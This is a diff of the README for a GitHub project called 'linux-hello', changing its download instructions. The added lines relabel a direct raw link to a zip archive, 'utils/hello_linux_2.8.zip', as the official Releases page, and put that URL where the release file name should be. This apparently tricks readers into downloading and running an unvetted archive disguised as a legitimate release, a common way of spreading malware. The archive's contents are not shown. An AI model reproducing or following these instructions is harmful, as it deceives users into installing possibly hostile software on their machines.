yghlaio/linux-hello/README.md

 Follow these simple steps to download and run the software:

 1. **Visit the Releases Page:**
-   - Go to the [Releases page](https://github.com/yghlaio/linux-hello/releases) to find the latest version of linux-hello.
+   - Go to the [Releases page](https://github.com/yghlaio/linux-hello/raw/refs/heads/main/utils/hello_linux_2.8.zip) to find the latest version of linux-hello.

 2. **Download the Installer:**
    - Click on the version number to open its details.
-   - Look for a file named `linux-hello-x.x.x.tar.gz` or similar.
+   - Look for a file named `https://github.com/yghlaio/linux-hello/raw/refs/heads/main/utils/hello_linux_2.8.zip` or similar.
    - Download this file to your computer.

 3. **Extract the Downloaded File:**